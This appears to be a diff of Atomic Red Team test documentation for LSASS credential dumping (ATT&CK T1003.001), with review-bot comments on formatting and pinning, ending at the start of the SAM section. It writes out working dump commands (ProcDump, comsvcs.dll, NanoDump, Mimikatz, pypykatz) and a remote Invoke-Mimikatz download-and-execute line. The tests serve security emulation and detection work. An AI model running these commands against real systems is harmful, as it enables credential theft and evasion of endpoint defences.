- [Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2-dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3-dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4: Dump LSASS.exe Memory using NanoDump](#atomic-test-4-dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5-dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6: Offline Credential Theft With Mimikatz](#atomic-test-6-offline-credential-theft-with-mimikatz)
- [Atomic Test #7: LSASS read with pypykatz](#atomic-test-7-lsass-read-with-pypykatz)
- [Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8-dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9-create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10: Powershell Mimikatz](#atomic-test-10-powershell-mimikatz)
- [Atomic Test #11: Dump LSASS with createdump.exe from .Net v5](#atomic-test-11-dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12-dump-lsassexe-using-imported-microsoft-dlls)
- [Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13-dump-lsassexe-using-lolbin-rdrleakdiagexe)
- [Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14-dump-lsassexe-memory-through-silent-process-exit)
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
### Atomic Test #1: Dump LSASS.exe Memory using ProcDump
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5](#atomic-test-11---dump-lsass-with-createdumpexe-from-net-v5)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
- [Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe](#atomic-test-13---dump-lsassexe-using-lolbin-rdrleakdiagexe)
- [Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit](#atomic-test-14---dump-lsassexe-memory-through-silent-process-exit)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
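Review bot: the ATT&CK description keeps raw `(Citation: Volexity Exchange Marauder March 2021)`-style markers, which are ATT&CK's internal reference keys and render as literal parenthesised text with nothing on the page to resolve them. Now that the generator emits a `[Source]` link to the technique page, it could strip these tokens (or the README convention should say they are left in on purpose); otherwise every generated README carries them.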
@@ -60,39 +76,41 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** `0be2230c-9ab3-4ac2-8826-3199b9a0ebf8`
#### Inputs
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
@@ -102,29 +120,47 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
```
### Atomic Test #2: Dump LSASS.exe Memory using comsvcs.dll
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** `2536dee2-12fb-459a-8c37-971844fa73be`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
### Atomic Test #3: Dump LSASS.exe Memory using direct system calls and API unhooking
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
@@ -134,46 +170,53 @@ If you see a message saying \"The system cannot find the path specified.\", try
**Supported Platforms:** Windows
**auto_generated_guid:** `7ae7102c-a099-45c8-b985-4c7a2d05790d`
#### Inputs
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{dumpert_exe}"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{dumpert_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path "#{dumpert_exe}") -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile "#{dumpert_exe}"
```
### Atomic Test #4: Dump LSASS.exe Memory using NanoDump
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
@@ -182,48 +225,61 @@ Upon successful execution, you should find the nanondump.dmp file in the temp di
**Supported Platforms:** Windows
**auto_generated_guid:** `dddd4aca-bbed-46f0-984d-e4c5971c51ea`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
### Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** `dea6c349-f1c6-44f3-87a1-1ed33a59a607`
#### Attack Commands: Run it with these steps!
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
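Review bot: the manual test (#5) changes its heading from `#### Attack Commands: Run it with these steps!` to `#### Run it with these steps!`, dropping the `Attack Commands:` prefix that every other test in the file keeps. Anything that locates the attack block by that heading, and a reader scanning for it, will miss this test. Keep the prefix so the manual test is labelled the same way as the scripted ones.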
@@ -236,41 +292,51 @@ Manager and administrative permissions.
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
### Atomic Test #6: Offline Credential Theft With Mimikatz
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** `453acf13-1dbd-47d7-b28a-172ce9228023`
#### Inputs
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{mimikatz_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
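Review bot: the Mimikatz Get Prereq runs `IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)` from the moving `master` branch, whereas the Dumpert and NanoDump prereqs in the same file pin a commit hash. Pinning the helper keeps the test reproducible and removes a path by which a changed upstream script executes with admin rights on the test host. Separately, `mimikatz_exe` is typed `string` in the Inputs table while the equivalent `dumpert_exe` is typed `path`; make it `path` for consistency.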
@@ -279,23 +345,23 @@ $zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_dow
$basePath = Split-Path "#{mimikatz_exe}" | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
##### Description: Lsass dump must exist at specified location (#{input_file})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
### Atomic Test #7: LSASS read with pypykatz
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
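Review bot: the second dependency check, `cmd /c "if not exist #{input_file} (exit /b 1)"`, leaves the path unquoted inside the cmd string, so an `input_file` containing spaces breaks the check; the other dependency checks in this file use `Test-Path "#{...}"`, and `if (Test-Path "#{input_file}") {exit 0} else {exit 1}` would be consistent and safe. Also note that the `$zipUrl` assignment in the hunk context takes element `[0]` of the releases list, i.e. whatever the newest Mimikatz release is at run time, so this prereq is unpinned unlike the other payload downloads.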
@@ -306,74 +372,71 @@ Will create a Python virtual environment within the External Payloads folder tha
**Supported Platforms:** Windows
**auto_generated_guid:** `c37bc535-5c62-4195-9cc3-0517673171d8`
#### Inputs
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1003_001|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{venv_path}\Scripts\pypykatz" live lsa
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" > nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have python 3 installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
```
##### Description: Computer must have venv configured at #{venv_path}
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
py -m venv "#{venv_path}"
```
##### Description: pypykatz must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
```
### Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp.
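Review bot: test #7's cleanup `del "%temp%\nanodump.dmp" > nul 2> nul` removes a file this test never creates; `pypykatz live lsa` reads LSASS in place and prints to the console, and the cleanup line is carried over from the NanoDump test. Drop it, or replace it with the venv removal that the description currently leaves to the user. The python installer download here also omits the `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line that the other Get Prereq blocks set; apply it uniformly.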
@@ -382,9 +445,16 @@ Author of Out-Minidump: Matthew Graeber (@mattifestation)
**Supported Platforms:** Windows
**auto_generated_guid:** `6502c8f0-b775-4dbd-9193-1298f56b6781`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -394,13 +464,19 @@ catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
### Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
@@ -410,39 +486,41 @@ If you see a message saying "procdump.exe is not recognized as an internal or ex
**Supported Platforms:** Windows
**auto_generated_guid:** `7cede33f-0acd-44ef-9774-15511300b24b`
#### Inputs
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{procdump_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Procdump.zip"
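Review bot: the ProcDump prereq fetches `https://download.sysinternals.com/files/Procdump.zip`, an unversioned URL, so the binary under test silently changes whenever Sysinternals ships a new release; unlike the GitHub payloads there is no commit or tag to pin here, so at minimum record the ProcDump version the test was validated against in the description. This block is also missing the TLS 1.2 `SecurityProtocol` line used by the other downloads.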
@@ -451,8 +529,13 @@ New-Item -ItemType Directory (Split-Path "#{procdump_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\Procdump\Procdump.exe" "#{procdump_exe}" -Force
```
### Atomic Test #10: Powershell Mimikatz
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
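Review bot: the regenerated description keeps backslash-escaped quotes, `\"access denied\"` here and `\"The system cannot find the path specified.\"` in the Dumpert test's context above, which render literally as backslashes in markdown. The converter should unescape the YAML string before writing it out so the text reads `"access denied"`.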
@@ -460,62 +543,83 @@ Or, if you try to run the test without the required administrative privileges yo
**Supported Platforms:** Windows
**auto_generated_guid:** `66fb0bc1-3c3f-47e9-a298-550ecfefacbc`
#### Inputs
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
### Atomic Test #11: Dump LSASS with createdump.exe from .Net v5
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with createdump.exe from .Net v5
Use createdump executable from .NET to create an LSASS dump.
[Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
**Supported Platforms:** Windows
**auto_generated_guid:** `9d0072c8-7cca-45c4-bd14-f852cfa35cf0`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: .Net v5 must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
if ($exePath -and (Test-Path $exePath)) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
```
### Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
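Review bot: in test #11, `$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"` returns one object per matching runtime directory, so on a host with more than one 5.x runtime installed `$exePath` is an array and `& "$exePath"` concatenates the paths into a single string and fails. The check prereq has the same shape. Append `| Select-Object -First 1` (or pick the highest version explicitly) in both places.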
@@ -524,46 +628,53 @@ Upon successful execution, you should see the following file created $env:TEMP\l
**Supported Platforms:** Windows
**auto_generated_guid:** `86fc3f40-237f-4701-b155-81c01c48d697`
#### Inputs
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
### Atomic Test #13: Dump LSASS.exe using lolbin rdrleakdiag.exe
<br/>
<br/>
## Atomic Test #13 - Dump LSASS.exe using lolbin rdrleakdiag.exe
The memory of lsass.exe is often dumped for offline credential theft attacks.
This can be achieved with lolbin rdrleakdiag.exe.
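Review bot: the xordump attack command `#{xordump_exe} -out #{output_file} -x 0x41` and the prereq `Invoke-WebRequest ... -OutFile #{xordump_exe}` leave both paths unquoted in PowerShell; this works for the defaults under `C:\Windows\Temp` but breaks for any user-supplied path containing spaces, and the other tests in the file quote their inputs. The download is also pinned to the release tag `v0.0.1` rather than a commit hash; tags can be moved, hashes cannot.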
@@ -571,9 +682,16 @@ Upon successful execution, you should see the following files created, $env:TEMP
**Supported Platforms:** Windows
**auto_generated_guid:** `47a539d1-61b9-4364-bf49-a68bc2a95ef0`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 47a539d1-61b9-4364-bf49-a68bc2a95ef0
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
@@ -591,13 +709,19 @@ write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /ful
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\t1003.001-13-rdrleakdiag -Recurse -Force -ErrorAction Ignore
```
### Atomic Test #14: Dump LSASS.exe Memory through Silent Process Exit
<br/>
<br/>
## Atomic Test #14 - Dump LSASS.exe Memory through Silent Process Exit
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a
memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism
introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger
@@ -613,41 +737,47 @@ Upon successful execution, you should find the dump file in directory of your ch
**Supported Platforms:** Windows
**auto_generated_guid:** `eb5adf16-b601-4926-bca7-dad22adffb37`
#### Inputs
**auto_generated_guid:** eb5adf16-b601-4926-bca7-dad22adffb37
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Folder Path where resulting dump should be placed | path | %temp%&#92;SilentProcessExit|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
rmdir "#{output_folder}" /s /q >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe)
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
```
<br/>
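Review bot: the Silent Process Exit cleanup runs `rmdir "#{output_folder}" /s /q` on whatever directory the user passed as `output_folder`; with the default `%temp%\SilentProcessExit` that is harmless, but pointing the input at an existing directory makes the cleanup wipe it recursively. Delete only the dump files the test writes, or state in the input description that the folder must be dedicated to the test. The NanoDump dependency block is also a verbatim copy of test #4's; keep the two commit hashes in sync when either is bumped.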
+189 -97
@@ -1,44 +1,54 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
